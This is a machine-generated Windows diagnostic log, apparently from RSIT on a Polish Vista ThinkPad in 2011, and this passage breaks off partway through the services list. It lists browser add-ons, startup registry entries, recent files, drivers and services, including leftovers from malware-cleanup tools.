======Registry dump====== [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}] Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15 62376] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1E8A6170-7264-4D0F-BEAE-D42A53123C75}] C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll [2007-01-12 96936] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}] SSVHelper Class - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll [2007-07-12 501136] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper 
Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}] avast! WebRep - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2011-07-04 820864] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0}] Windows Live Toolbar Helper - c:\Program Files\Windows Live Toolbar\msntb.dll [2007-02-12 546672] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F040E541-A427-4CF7-85D8-75E3E0F476C5}] CPwmIEBrowserHelper Object - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll [2007-08-09 795960] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar] {90222687-F593-4738-B738-FBEE9C7B26DF} - Show Norton Toolbar - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll [2007-01-12 607888] {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - Windows Live Toolbar - c:\Program Files\Windows Live Toolbar\msntb.dll [2007-02-12 546672] {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - avast! 
WebRep - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2011-07-04 820864] {32099AAC-C132-4136-9E9A-4E364A424E17} - DAEMON Tools Toolbar - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll [2011-01-20 988480] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] ""= [] "MSConfig"=C:\Windows\system32\msconfig.exe [2006-11-02 222208] "avast"=C:\Program Files\AVAST Software\Avast\avastUI.exe [2011-07-04 3493720] "TrojanScanner"=C:\Program Files\Trojan Remover\Trjscan.exe [2011-05-18 1233856] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "Tok-Cirrhatus"= [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ACTray] C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe [2007-07-05 419112] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ACWLIcon] C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe [2007-07-05 124200] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2010-11-15 932288] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher] C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [2010-11-15 35736] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AMSG] C:\Program Files\ThinkVantage\AMSG\Amsg.exe [2007-02-01 419376] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AwaySch] C:\Program Files\Lenovo\AwayTask\AwaySch.EXE [2006-11-07 91688] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BLOG] rundll32 C:\PROGRA~1\ThinkPad\UTILIT~1\BTVLogEx.DLL,StartBattLog [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ccApp] C:\Program Files\Common Files\Symantec Shared\ccApp.exe [2007-01-09 115816] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ChomikBox] C:\Program Files\ChomikBox\chomikbox.exe [] 
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cssauth] C:\Program Files\Lenovo\Client Security Solution\cssauth.exe [2007-08-09 2630968] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DiskeeperSystray] C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe [2006-11-15 217176] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ehTray.exe] C:\Windows\ehome\ehTray.exe [2006-11-02 125440] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EZEJMNAP] C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe [2007-03-28 243248] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HotKeysCmds] C:\Windows\system32\hkcmd.exe [2007-09-24 154136] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IgfxTray] C:\Windows\system32\igfxtray.exe [2007-09-24 141848] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IPLA!] C:\Program Files\ipla\ipla.exe [2011-06-03 19764728] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iPlusManager] C:\Program Files\iPlus\iPlusChecker.exe [2008-05-30 409600] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LenovoOobeOffers] c:\SWTOOLS\LenovoWelcome\LenovoOobeOffers.exe [2007-09-25 28672] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LPManager] C:\PROGRA~1\Lenovo\LENOVO~2\LPMGR.exe [2007-07-12 124256] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\nmapp] C:\Program Files\Pure Networks\Network Magic\nmapp.exe [2007-03-14 321088] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Persistence] C:\Windows\system32\igfxpers.exe [2007-09-24 129560] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PWMTRV] rundll32 C:\PROGRA~1\ThinkPad\UTILIT~1\PWMTR32V.DLL,PwrMgrBkGndMonitor [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sidebar] C:\Program 
Files\Windows Sidebar\sidebar.exe [2008-11-10 1232896] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype] C:\Program Files\Skype\Phone\Skype.exe /nosplash /minimized [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched] C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe [2007-07-12 132496] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Symantec PIF AlertEng] C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe [2008-01-29 583048] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPFNF7] C:\Program Files\Lenovo\NPDIRECT\TPFNF7SP.exe [2007-11-29 59168] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPHOTKEY] C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe [2007-03-09 66176] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TpShocks] C:\Windows\system32\TpShocks.exe [2007-11-22 181536] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TrackPointSrv] C:\Windows\system32\tp4serv.exe [2007-04-26 91184] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TVT Scheduler Proxy] C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe [2007-07-10 540672] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe [2008-11-10 1006264] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe [2006-11-02 201728] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^BTTray.lnk] C:\PROGRA~1\ThinkPad\BLUETO~1\BTTray.exe [2007-03-29 719664] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk] 
C:\PROGRA~1\DIGITA~1\DLG.exe [2006-11-03 50688] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^LenovoRegistration.lnk] C:\SWTOOLS\LENOVO~1\LENOVO~1.CMD [2007-09-26 166] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk] C:\PROGRA~1\MCAFEE~1\20DEB9~1.181\SSSCHE~1.EXE [2010-01-15 255536] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui] C:\Windows\system32\igfxdev.dll [2007-09-13 204800] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "notification packages"=scecli ACGina [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\PEVSystemStart] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\procexp90.Sys] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableCMD"=0 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] "dontdisplaylastusername"=0 "legalnoticecaption"= "legalnoticetext"= "shutdownwithoutlogon"=1 "undockwithoutlogon"=1 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer] "NoDriveTypeAutoRun"=145 [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list] [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32] "vidc.mrle"=msrle32.dll "vidc.msvc"=msvidc32.dll "msacm.imaadpcm"=imaadp32.acm "msacm.msg711"=msg711.acm "msacm.msgsm610"=msgsm32.acm "msacm.msadpcm"=msadp32.acm 
"midimapper"=midimap.dll "wavemapper"=msacm32.drv "vidc.uyvy"=msyuv.dll "vidc.yuy2"=msyuv.dll "vidc.yvyu"=msyuv.dll "vidc.iyuv"=iyuv_32.dll "vidc.i420"=iyuv_32.dll "vidc.yvu9"=tsbyuv.dll "msacm.l3acm"=C:\Windows\System32\l3codeca.acm "vidc.cvid"=iccvid.dll "wave"=wdmaud.drv "midi"=wdmaud.drv "mixer"=wdmaud.drv "aux"=wdmaud.drv "wave1"=wdmaud.drv "midi1"=wdmaud.drv "mixer1"=wdmaud.drv "wave2"=wdmaud.drv "midi2"=wdmaud.drv "mixer2"=wdmaud.drv "wave3"=wdmaud.drv "midi3"=wdmaud.drv "mixer3"=wdmaud.drv "aux1"=wdmaud.drv "msacm.vorbis"=vorbis.acm ======List of files/folders created in the last 1 month====== 2011-07-18 10:37:19 ----D---- C:\rsit 2011-07-18 10:17:00 ----D---- C:\Muzyja 2011-07-15 21:23:31 ----A---- C:\Windows\zip.exe 2011-07-15 21:23:31 ----A---- C:\Windows\SWXCACLS.exe 2011-07-15 21:23:31 ----A---- C:\Windows\SWSC.exe 2011-07-15 21:23:31 ----A---- C:\Windows\SWREG.exe 2011-07-15 21:23:31 ----A---- C:\Windows\sed.exe 2011-07-15 21:23:31 ----A---- C:\Windows\PEV.exe 2011-07-15 21:23:31 ----A---- C:\Windows\NIRCMD.exe 2011-07-15 21:23:31 ----A---- C:\Windows\MBR.exe 2011-07-15 21:23:31 ----A---- C:\Windows\grep.exe 2011-07-15 21:23:22 ----D---- C:\Windows\ERDNT 2011-07-15 21:23:19 ----SD---- C:\ComboFix 2011-07-15 21:23:15 ----D---- C:\Qoobox 2011-07-15 21:23:01 ----SD---- C:\32788R22FWJFW 2011-07-15 21:16:11 ----D---- C:\Program Files\Trend Micro 2011-07-15 21:13:47 ----D---- C:\Users\Max\AppData\Roaming\Safer Networking 2011-07-15 21:13:21 ----D---- C:\Program Files\Safer Networking 2011-07-15 21:00:17 ----D---- C:\Users\Max\AppData\Roaming\AIMP 2011-07-15 20:59:16 ----D---- C:\Program Files\AIMP2 2011-07-15 20:38:46 ----AD---- C:\ProgramData\TEMP 2011-07-15 20:38:18 ----A---- C:\Windows\system32\ztvunrar36.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\ztvunace26.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\ztvcabinet.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\UNRAR3.dll 2011-07-15 20:38:18 ----A---- 
C:\Windows\system32\unacev2.dll 2011-07-15 20:38:17 ----D---- C:\Users\Max\AppData\Roaming\Simply Super Software 2011-07-15 20:38:17 ----D---- C:\ProgramData\Simply Super Software 2011-07-15 20:38:17 ----D---- C:\Program Files\Trojan Remover 2011-07-13 11:48:57 ----D---- C:\Windows\system32\Adobe 2011-07-11 13:14:07 ----D---- C:\Program Files\DAEMON Tools Toolbar 2011-07-11 13:13:33 ----D---- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite 2011-07-11 13:13:33 ----D---- C:\ProgramData\DAEMON Tools Lite 2011-07-09 17:31:35 ----D---- C:\7' 2011-07-08 16:01:51 ----D---- C:\Program Files\RegCleaner 2011-07-08 14:36:30 ----A---- C:\Windows\system32\drivers\aswFsBlk.sys 2011-07-08 14:36:29 ----A---- C:\Windows\system32\drivers\aswSP.sys 2011-07-08 14:36:27 ----A---- C:\Windows\system32\drivers\aswTdi.sys 2011-07-08 14:36:27 ----A---- C:\Windows\system32\drivers\aswRdr.sys 2011-07-08 14:36:26 ----A---- C:\Windows\system32\drivers\aswSnx.sys 2011-07-08 14:36:25 ----A---- C:\Windows\system32\drivers\aswMonFlt.sys 2011-07-08 14:35:28 ----A---- C:\Windows\system32\aswBoot.exe 2011-07-08 14:35:28 ----A---- C:\Windows\avastSS.scr 2011-07-08 13:37:06 ----D---- C:\Dokument 2011-07-08 13:34:44 ----D---- C:\Zdjecia 2011-06-28 10:35:24 ----D---- C:\Users\Max\AppData\Roaming\Skype 2011-06-28 10:35:18 ----D---- C:\ProgramData\Google 2011-06-28 10:34:59 ----D---- C:\ProgramData\Skype 2011-06-26 12:28:22 ----ASH---- C:\hiberfil.sys 2011-06-26 12:25:20 ----A---- C:\Windows\ntbtlog.txt ======List of files/folders modified in the last 1 month====== 2011-07-18 10:37:20 ----D---- C:\Windows\Prefetch 2011-07-18 10:37:03 ----D---- C:\Windows\Temp 2011-07-18 10:16:32 ----D---- C:\Windows\System32 2011-07-18 10:16:32 ----D---- C:\Windows\inf 2011-07-18 10:16:32 ----A---- C:\Windows\system32\PerfStringBackup.INI 2011-07-17 22:12:56 ----SHD---- C:\System Volume Information 2011-07-17 22:12:08 ----D---- C:\Windows\tracing 2011-07-17 22:10:47 ----D---- C:\Windows\Minidump 2011-07-17 22:10:41 ----D---- 
C:\Windows 2011-07-16 07:39:45 ----SHD---- C:\Windows\Installer 2011-07-16 07:39:12 ----A---- C:\Windows\win.ini 2011-07-15 21:23:16 ----D---- C:\Windows\system32\drivers 2011-07-15 21:16:11 ----RD---- C:\Program Files 2011-07-15 20:53:30 ----D---- C:\Windows\system32\catroot 2011-07-15 20:38:46 ----HD---- C:\ProgramData 2011-07-15 20:35:30 ----D---- C:\Windows\system32\Tasks 2011-07-14 22:04:25 ----D---- C:\Users\Max\AppData\Roaming\ipla 2011-07-13 17:06:47 ----D---- C:\SWSHARE 2011-07-13 11:48:58 ----SD---- C:\Windows\Downloaded Program Files 2011-07-12 22:22:04 ----D---- C:\Windows\Tasks 2011-07-12 22:22:04 ----D---- C:\Program Files\Google 2011-07-12 14:30:43 ----D---- C:\Program Files\Mozilla Firefox 2011-07-12 14:22:27 ----D---- C:\Program Files\Opera 2011-07-12 13:11:06 ----D---- C:\Windows\system32\catroot2 2011-07-11 12:51:39 ----D---- C:\output 2011-07-08 14:36:19 ----D---- C:\Windows\winsxs 2011-07-08 14:35:04 ----D---- C:\ProgramData\AVAST Software 2011-07-08 14:35:04 ----D---- C:\Program Files\AVAST Software 2011-07-08 14:20:03 ----D---- C:\Windows\pss 2011-07-08 14:18:03 ----A---- C:\Windows\system32\PROCDB.INI 2011-07-08 14:18:01 ----A---- C:\Windows\system32\IPSCtrl.INI 2011-07-08 14:16:04 ----D---- C:\ProgramData\Lenovo 2011-07-08 14:16:02 ----D---- C:\Program Files\Microsoft Silverlight 2011-07-08 14:15:55 ----D---- C:\Windows\system32\spool 2011-07-08 14:15:55 ----D---- C:\Users\Max\AppData\Roaming\PhotoScape ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R0 iaStor;Intel AHCI Controller; C:\Windows\system32\DRIVERS\iaStor.sys [2007-02-12 277784] R0 Shockprf;Shockprf; C:\Windows\System32\DRIVERS\Apsx86.sys [2007-10-16 103472] R0 TPDIGIMN;TPDIGIMN; C:\Windows\System32\DRIVERS\ApsHM86.sys [2007-10-16 19504] R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2011-07-04 25432] R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2011-07-04 441176] R1 aswSP;aswSP; 
C:\Windows\system32\drivers\aswSP.sys [2011-07-04 309848] R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2011-07-04 43608] R1 eeCtrl;Symantec Eraser Control driver; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [2007-01-10 387384] R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20070108.003\IDSvix86.sys [2006-12-28 212280] R1 lenovo.smi;Lenovo System Interface Driver; C:\Windows\system32\DRIVERS\smiif32.sys [2006-08-30 13744] R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-01-11 25400] R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-01-09 191544] R1 TPPWRIF;TPPWRIF; C:\Windows\System32\drivers\Tppwr32v.sys [2007-12-06 12080] R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2011-07-04 19544] R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2011-07-04 54104] R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672] R2 PROCDD;IPS Helper Driver; C:\Windows\system32\DRIVERS\PROCDD.SYS [2006-11-06 12080] R2 tvtfilter;tvtfilter; C:\Windows\system32\DRIVERS\tvtfilter.sys [2008-11-10 33536] R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2007-04-10 8704] R3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0; C:\Windows\system32\DRIVERS\b57nd60x.sys [2007-05-02 179712] R3 BthEnum;Usługa wyliczania Bluetooth; C:\Windows\system32\DRIVERS\BthEnum.sys [2011-04-04 19456] R3 BthPan;Urządzenie Bluetooth (sieć osobista); C:\Windows\system32\DRIVERS\bthpan.sys [2006-11-02 92160] R3 BTHUSB;Sterownik USB odbiornika radiowego Bluetooth; C:\Windows\System32\Drivers\BTHUSB.sys [2011-04-04 29184] R3 btwaudio;Urz¹dzenie dŸwiêkowe Bluetooth; C:\Windows\system32\drivers\btwaudio.sys [2007-03-29 79664] R3 btwavdt;Bluetooth AVDT Service; C:\Windows\system32\drivers\btwavdt.sys [2007-02-27 81200] R3 btwrchid;btwrchid; C:\Windows\system32\DRIVERS\btwrchid.sys [2007-02-27 16432] R3 
EraserUtilRebootDrv;EraserUtilRebootDrv; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2007-01-10 102712] R3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDARTN.sys [2007-04-27 215040] R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2007-03-25 984064] R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2007-03-25 208384] R3 IBMPMDRV;IBMPMDRV; C:\Windows\system32\DRIVERS\ibmpmdrv.sys [2007-05-31 21424] R3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd32.sys [2007-09-13 1925632] R3 NETw4v32;Sterownik karty Intel(R) Wireless WiFi Link dla systemu Windows Vista 32 Bit; C:\Windows\system32\DRIVERS\NETw4v32.sys [2007-04-29 2219520] R3 psadd;Lenovo Parties Service Access Device Driver; C:\Windows\system32\DRIVERS\psadd.sys [2007-05-22 21376] R3 RFCOMM;Urządzenie Bluetooth (Protokół TDI RFCOMM); C:\Windows\system32\DRIVERS\rfcomm.sys [2006-11-02 49664] R3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-01-09 12984] R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2008-11-10 115000] R3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-01-09 145976] R3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-01-09 40120] R3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-01-09 38200] R3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-01-09 27576] R3 Tp4Track;PS/2 TrackPoint Driver; C:\Windows\system32\DRIVERS\tp4track.sys [2007-04-26 22832] R3 TVTI2C;Lenovo SM bus driver; C:\Windows\system32\DRIVERS\Tvti2c.sys [2007-05-22 30336] R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2007-03-25 660480] S3 BTHPORT;Sterownik portu Bluetooth; C:\Windows\System32\Drivers\BTHport.sys [2011-04-04 220160] S3 drmkaud;Microsoft Kernel DRM Audio Descrambler; C:\Windows\system32\drivers\drmkaud.sys [2006-11-02 5632] S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS 
[2006-11-02 200704] S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2007-09-13 1925632] S3 MSKSSRV;Serwer proxy usługi Microsoft Streaming; C:\Windows\system32\drivers\MSKSSRV.sys [2006-11-02 8192] S3 MSPCLOCK;Serwer proxy zegara Microsoft Streaming; C:\Windows\system32\drivers\MSPCLOCK.sys [2006-11-02 5888] S3 MSPQM;Serwer proxy menedżera jakości Microsoft Streaming; C:\Windows\system32\drivers\MSPQM.sys [2006-11-02 5504] S3 MSTEE;Konwerter strumieni Tee/Sink-to-Sink Microsoft Streaming; C:\Windows\system32\drivers\MSTEE.sys [2006-11-02 6016] S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20070110.052\NAVENG.SYS [2007-01-10 80408] S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20070110.052\NAVEX15.SYS [2007-01-10 833048] S3 NETw3v32;Sterownik karty Intel(R) PRO/Wireless 3945ABG dla 32-bitowej wersji systemu Windows Vista; C:\Windows\system32\DRIVERS\NETw3v32.sys [2006-11-02 1781760] S3 nmwcd;Nokia USB Phone Parent; C:\Windows\system32\drivers\ccdcmb.sys [2008-05-02 17536] S3 SPBBCDrv;SPBBCDrv; \??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys [2007-01-03 417592] S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-01-11 247608] S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-01-11 276792] S3 upperdev;upperdev; C:\Windows\system32\DRIVERS\usbser_lowerflt.sys [2008-05-02 8064] S3 usbaudio;Sterownik audio USB (WDM); C:\Windows\system32\drivers\usbaudio.sys [2006-11-02 71552] S3 usbser;USB Modem Driver; C:\Windows\system32\DRIVERS\usbser.sys [2006-11-02 28160] S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2006-11-02 39936] S3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2006-11-02 82560] ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R2 avast! Antivirus;avast! 
Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2011-07-04 42184] R2 BthServ;@%SystemRoot%\System32\bthserv.dll,-101; C:\Windows\system32\svchost.exe [2006-11-02 22016] R2 nmservice;Pure Networks Network Magic Service; C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe [2007-03-14 321088] R2 TPHDEXLGSVC;ThinkPad HDD APS Logging Service; C:\Windows\System32\TPHDEXLG.exe [2007-10-16 37424] R2 TVT Backup Protection Service;TVT Backup Protection Service; C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe [2007-07-10 569344] R2 TVT Backup Service;TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [2007-07-10 950272] S3 nmraapache;Pure Networks Net2Go Service; C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe [2007-03-14 12800] S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136] S4 AcPrfMgrSvc;Ac Profile Manager Service; C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe [2007-07-05 91432] S4 AcSvc;Access Connections Main Service; C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe [2007-07-05 206120] S4 ccEvtMgr;Symantec Event Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 ccSetMgr;Symantec Settings Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 CLTNetCnService;Symantec Lic NetConnect service; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 comHost;COM Host; C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe [2007-01-12 49248] S4 Diskeeper;Diskeeper; C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe [2006-11-15 634988] S4 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120] S4 IBMPMSVC;ThinkPad PM Service; C:\Windows\system32\ibmpmsvc.exe [2007-05-31 36400] S4 IDriverT;InstallDriver Table Manager; 
C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632] S4 IPSSVC;IPS Core Service; C:\Windows\system32\IPSSVC.EXE [2007-01-30 108080] S4 ISPwdSvc;Symantec IS Password Validation; C:\Program Files\Norton Internet Security\isPwdSvc.exe [2007-01-14 80504] S4 LiveUpdate Notice Ex;LiveUpdate Notice Service Ex; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 LiveUpdate Notice Service;LiveUpdate Notice Service; C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe [2008-01-29 583048] S4 LiveUpdate;LiveUpdate; C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE [2007-09-26 2999664] S4 McComponentHostService;McAfee Security Scan Component Host Service; C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe [2010-01-15 227232] S4 SUService;System Update; c:\Program Files\Lenovo\System Update\SUService.exe [2007-06-07 13312] S4 Symantec Core LC;Symantec Core LC; C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe [2008-11-10 1174664] S4 SymAppCore;Symantec AppCore Service; C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe [2007-01-05 47712] S4 ThinkVantage Registry Monitor Service;ThinkVantage Registry Monitor Service; C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe [2007-07-10 644408] S4 TPHKSVC;On Screen Display; C:\Program Files\LENOVO\HOTKEY\TPHKSVC.exe [2007-03-02 55936] S4 TSSCoreService;TSS Core 